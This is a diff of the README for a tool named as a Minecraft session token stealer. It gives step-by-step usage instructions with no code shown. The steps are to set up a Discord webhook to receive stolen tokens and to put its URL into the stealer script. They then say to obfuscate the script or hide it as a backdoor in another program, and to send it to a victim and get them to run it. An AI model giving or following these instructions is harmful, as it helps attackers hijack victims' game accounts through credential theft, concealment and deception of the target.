wodxgod/Minecraft-Session-Token-Stealer/README.md

 # How to use
  1. Create a webhook on your Discord server.
 I recommend creating a new server.
- 2. Change the 'WEBHOOK_URL' variable in [token-stealer.py](token-stealer.py)
+ 2. Change the 'WEBHOOK_URL' variable value to your Discord webhook URL in [token-stealer.py](token-stealer.py)
- 3. (obfuscate the code or install it as a backdoor in an other script.)
+ 3. *(obfuscate the code or install it as a backdoor in an other script.)*
- 4. Make the victim run the script.
+ 4. Send the script to your victim and make them run it.

 <br>